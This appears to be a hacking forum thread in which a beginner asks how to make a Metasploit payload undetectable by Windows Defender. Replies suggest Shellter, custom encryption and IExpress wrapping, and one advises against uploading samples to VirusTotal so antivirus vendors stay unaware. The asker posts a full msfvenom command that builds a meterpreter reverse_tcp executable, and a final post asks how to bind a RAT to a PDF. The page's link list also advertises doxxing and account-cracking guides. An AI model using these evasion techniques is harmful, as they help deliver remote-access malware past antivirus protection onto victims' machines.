I am new to this kali linux stuff, so far i have worked with aircrack-ng, msfvenom and meterpreter. So please help me even if my question may sound silly. Every time i want to test my payload i have to deactivate chrome and windows defender and i want to get better in this...so any ideas? Everthing i have tried so far from forums didn't work or i didn't understand some stuff...if you have a solution using gcc compiler i am open because i have 5 years in c/c++/c# programming Thanks in advance :)
Forum Thread: How Can I Make My Payload Undetectable?
- Hot
- Active
-
Forum Thread: How to Track Who Is Sms Bombing Me . 4 Replies
2 mo ago -
Forum Thread: Removing Pay-as-You-Go Meter on Loan Phones. 1 Replies
2 mo ago -
Forum Thread: Hydra Syntax Issue Stops After 16 Attempts 3 Replies
2 mo ago -
Forum Thread: moab5.Sh Error While Running Metasploit 17 Replies
3 mo ago -
Forum Thread: Execute Reverse PHP Shell with Metasploit 1 Replies
4 mo ago -
Forum Thread: Install Metasploit Framework in Termux No Root Needed M-Wiz Tool 1 Replies
5 mo ago -
Forum Thread: Hack and Track People's Device Constantly Using TRAPE 35 Replies
6 mo ago -
Forum Thread: When My Kali Linux Finishes Installing (It Is Ready to Boot), and When I Try to Boot It All I Get Is a Black Screen. 8 Replies
7 mo ago -
Forum Thread: HACK ANDROID with KALI USING PORT FORWARDING(portmap.io) 12 Replies
7 mo ago -
Forum Thread: Hack Instagram Account Using BruteForce 208 Replies
7 mo ago -
Forum Thread: Metasploit reverse_tcp Handler Problem 47 Replies
9 mo ago -
Forum Thread: How to Train to Be an IT Security Professional (Ethical Hacker) 22 Replies
9 mo ago -
Metasploit Error: Handler Failed to Bind 41 Replies
10 mo ago -
Forum Thread: How to Hack Android Phone Using Same Wifi 21 Replies
10 mo ago -
How to: HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide] 177 Replies
10 mo ago -
How to: Crack Instagram Passwords Using Instainsane 36 Replies
10 mo ago -
Forum Thread: How to Hack an Android Device Remotely, to Gain Acces to Gmail, Facebook, Twitter and More 5 Replies
10 mo ago -
Forum Thread: How Many Hackers Have Played Watch_Dogs Game Before? 13 Replies
10 mo ago -
Forum Thread: How to Hack an Android Device with Only a Ip Adress 55 Replies
11 mo ago -
How to: Sign the APK File with Embedded Payload (The Ultimate Guide) 10 Replies
11 mo ago
-
How To: Find Vulnerable Webcams Across the Globe Using Shodan
-
How To: Use Kismet to Watch Wi-Fi User Activity Through Walls
-
How To: Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
-
How To: Scan for Vulnerabilities on Any Website Using Nikto
-
How To: Find Identifying Information from a Phone Number Using OSINT Tools
-
How To: Dox Anyone
-
How To: Crack Any Master Combination Lock in 8 Tries or Less Using This Calculator
-
How to Hack Wi-Fi: Cracking WEP Passwords with Aircrack-Ng
-
Hack Like a Pro: How to Find Vulnerable Targets Using Shodan—The World's Most Dangerous Search Engine
-
How To: Extract Bitcoin Wallet Addresses & Balances from Websites with SpiderFoot CLI
-
How To: Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
-
How To: Enumerate SMB with Enum4linux & Smbclient
-
How To: Intercept Images from a Security Camera Using Wireshark
-
How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How To: Crack Shadow Hashes After Getting Root on a Linux System
-
How To: Use SpiderFoot for OSINT Gathering
-
How To: Hunt Down Social Media Accounts by Usernames with Sherlock
-
How to Hack Wi-Fi: Creating an Evil Twin Wireless Access Point to Eavesdrop on Data
-
How To: The Top 80+ Websites Available in the Tor Network
-
How To: The Best-Selling VPN Is Now on Sale
21 Responses
There is almost no way unless you code it yourself now, AV detection is strong, now Veil-Evasion, Shelter, The fat rat (These are the payload encrypter)doesn't work.
Can you tell me how to do this or where to learn?
I have tried some example to copy some rows from msfvenom /x64/..... And some random character string in the code, i have compiled it but the dimension of the file was only 7kb compared to 70 from normal msfvenom, yes the windows defender hasnt found it but when i tried to run it, it gave me a warrning screen with publisher and something
Then you can also encrypt the normal payload by using your own encryption method or there are plenty of encrypters on github.
How do i encrypt it?
All of them use tools like you said before fatrat, vile
Because AV is used to base64 encryption that is from Veil and other payload hider, but if it is a encryption that was never used before in payloads it will work.
For example, there is Malbolge language, which is hard to decrypt
How can i make my own encrypting program?
If those programs don't work, you are using the wrong exe. I know for a fact that Shellter still works perfectly.
inbox me?
You can use Shellter. It's very simple to use and will make it mostly undetectable.
Go to my profile and read my tutorial. You can skip Part 1 entirety.
Shellter works best using a new exe file that was not already detectable.
Thanks a lot i will check it out tomorow and tell you how it worked
Hey thanks a lot, your shellter tutorial worked but i have some questions
virtual hug
i tried again today with shellter and windows defender detects it :((
Told ya. Those are old now.
Then why does it work perfectly for me?
Well, it detects mine though. Probably in 2018 it will be detected.
Have you tried on windows defender?
Yes. What I do is what's in my tutorial. Create an exe with Iexpress in Windows. Use the newest version of Shellter and inject the shell code. I have tested it on my windows 10 machine which has windows Defender and Malwarebytes Antimalware and neither detects it. Make sure you DO NOT upload to virus total, it will get detected by some AV, especially if you have your listener running, and they share the exe with every AV.
So i dont shell the payload created with msfvenom?
What payload are you creating with msfvenom?
msfvenom -p windows/meterpreter/reverse_tcp lhost and lport -e cmd/powershell_base64(not sure if this helps with anything) -i 4 -f exe > something.exe
PLEASE MY MASTERS ,IS THERE A WAY TO BIND A RAT VIRUS TO PDF USING KALI LINUS OR METASPLOIT?
Share Your Thoughts